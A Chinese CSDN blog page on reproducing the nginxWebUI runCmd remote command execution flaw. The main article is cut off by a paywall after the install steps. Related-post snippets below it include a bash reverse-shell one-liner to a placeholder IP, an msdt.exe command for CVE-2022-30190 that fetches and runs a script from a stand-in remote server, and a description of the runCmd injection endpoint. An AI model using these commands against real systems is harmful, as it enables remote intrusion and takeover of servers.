nginxWebUI 存在前台远程命令执行漏洞,安装以及复现过程

已于 2023-11-07 11:10:01 修改
阅读量332 收藏
点赞数 1
文章标签: 服务器 运维
于 2023-11-07 11:08:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lianhe20040122/article/details/134261623
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1、nginxWebUI简介

        方便快捷易用的Nginx可视化UI网页管理部署配置工具系统,使用Web网页系统来快速配置部署,支持在线配置你的Nginx/Openresty的反向代理、负载均衡、SSL/HTTPS证书免费签发,自动续签、TCP/UDP 3-4层转发、可以自定义参数字段、均衡负载节点、Nginx服务状态监控故障报警、集群配置同步等,快速部署多个或N个Nginx集群节点,支持导入现有Nginx配置文件让你无忧使用

2、漏洞影响的版本

        nginxWebUI <= 3.5.0

3、下载nginxWebUI的jar包

        我是用ubuntu18.04安装的nginxWebUI3.4.9

        我这里下载的是nginxWebUI3.4.9的包,下载的网址:

        nginxWebUI 发行版 - Gitee.com

4、安装nginxWebUI

         1.需要安装java和nginx

apt update

apt install openjdk-11-jdk

apt install nginx

        2.在home下面新建一个nginxWebUI目

最低0.47元/天 解锁文章
SHUA_nak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
NginxWEBUI框架RCE任意命令执行漏洞深度分析(含Poc和EXP)
qq_29616295的博客
08-18 1074
NginxWEBUI任意命令执行漏洞深度解析
NginxWebUI run Cmd远程命令执行漏洞
holyxp的博客
06-28 2030
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。​ nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令
Stable Diffusion WebUI 笔记本低显存无魔法本地安装使用(三)--- 安装相关python环境
最新发布
m0_60635001的博客
04-18 876
🍅 硬核资料:关注即可领取PPT模板、简历模板、行业经典书籍PDF。🍅 技术互助:技术群大佬指点迷津,你的问题可能不是问题,求资源在群里喊一声。🍅 面试题库:由技术群里的小伙伴们共同投稿,热乎的大厂面试真题,持续更新中。🍅 知识体系:含编程语言、算法、大数据生态圈组件(Mysql、Hive、Spark、Flink)、数据仓库、Python、前端等等。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
漏洞复现nginxWebUI 存在前台远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-09 1976
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI 存在前台远程命令执行漏洞,攻击者通过该漏洞获取服务器控制权限进而进一步获取敏感数据信息。
nginxWebUI 远程命令执行漏洞
m0_49025459的博客
06-29 863
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令
漏洞复现 || NginxWebUI 后台命令执行&runCmd远程命令执行
失心少年
07-05 744
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。1.前台使用GET方式利用如下POC执行id命令
nginxwebui-RCE漏洞复现
weixin_68999845的博客
09-21 707
nginxWebUI后台提供执行nginx相关命令的接口(/AdminPage/conf/runCmd),由于未对用户的输入进行过滤,导致可在后台执行任意命令。该漏洞属于命令拼接漏洞,所以可使用WAF进行防护。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。1./AdminPage/conf/runCmd后跟RCE_payload后紧跟&&nginx。该漏洞触发接口点为后台功能点,但攻击者不需要用户验证即可访问该url触发漏洞
nginxWebUI runCmd前台远程命令执行漏洞
weixin_62352348的博客
01-29 310
nginxWebUI是一款图形化管理nginx配置的工具,nginxWebUI由于未对用户的输入进行严格过滤,导致任意命令执行漏洞。该漏洞利用条件简单,漏洞危害较高。
漏洞复现-nginxWebUI runCmd前台远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-14 744
漏洞复现-nginxWebUI runCmd前台远程命令执行漏洞,附带自己写的poc脚本
nginx文件路径处理远程命令执行漏洞(转)
weixin_33834679的博客
01-18 836
转自:http://www.safe.sh/security/?type=detail&id=1606另参考:http://hi.baidu.com/higkoo/item/ed1e0cc9b9d7b3d6964452f1影响版本:Igor Sysoev nginx 0.8.xIgor Sysoev nginx 0.7.xIgor Sysoev nginx 0.6.x...
图形化的 Nginx 配置管理工具:NginxWebUI
04-28 4973
Nginx,作为最常见的HTTP和反向代理 Web 服务器之一,使用广泛。Nginx 功能丰富,使用特有的 nginx config 配置文件,可配置性强,模块众多。但是,这也使得在日常配置时较为繁琐,管理不易。同时,包括证书申请续签、配置历史版本管理、静态文件上传等,也需要运维人员的额外工作。如果能有一个图形化的配置后台,就可以在很大程度上简化配置工作。NginxWeb...
nginxWebUI runCmd命令执行漏洞复现
m0_49025459的博客
07-25 442
NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。
NginxWebUI-Docker部署
feifeiyechuan的博客
03-31 5320
NginxWebUINginxWebUI一、Nginx管理工具二、NginxWebUI-Docker部署1、拉取镜像文件2、启动容器3、打开 ip:port 进入主页三、NginxWebUI 接口调用 NginxWebUI 一、Nginx管理工具 NginxWebUI是 陈钇蒙 博主,开发的一款用于前台管理nginx系统的工具。 这款工具,免去了经常去服务器后台进行nginx.conf配置文件的更改,以及日志的分析,服务的重启等一些列的操作。只需要在前台界面中,点击录入即可快捷实现nginx的管理。 二、N
windows安装nginx可视化工具nginxWebUI
GSON的博客
04-13 3804
一、官网下载ngixn、解压压缩包 二、启动Nginx 1、进入安装目录下,找到nginx.exe,双击启动 2、访问地址:http://localhost/ 或 http://127.0.0.1如图所示,表示成功 三、安装nginxWebUI 1、准备,配置好jdk环境,可查阅 2、官网地址:http://www.nginxwebui.cn/,也可以下载源码然后package打包成jar 选择一个位置存放安装包,由于也是java开发的可视化工具所以,是个jar包,无需解压 .
Web渗透中的反弹Shell与端口转发的奇淫技巧
大方子
10-02 9553
奇淫技巧 0x00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0x01 反弹shell 1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口   bash -i &gt;&amp; /dev/tcp/x.x.x.x/2333 0&g...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值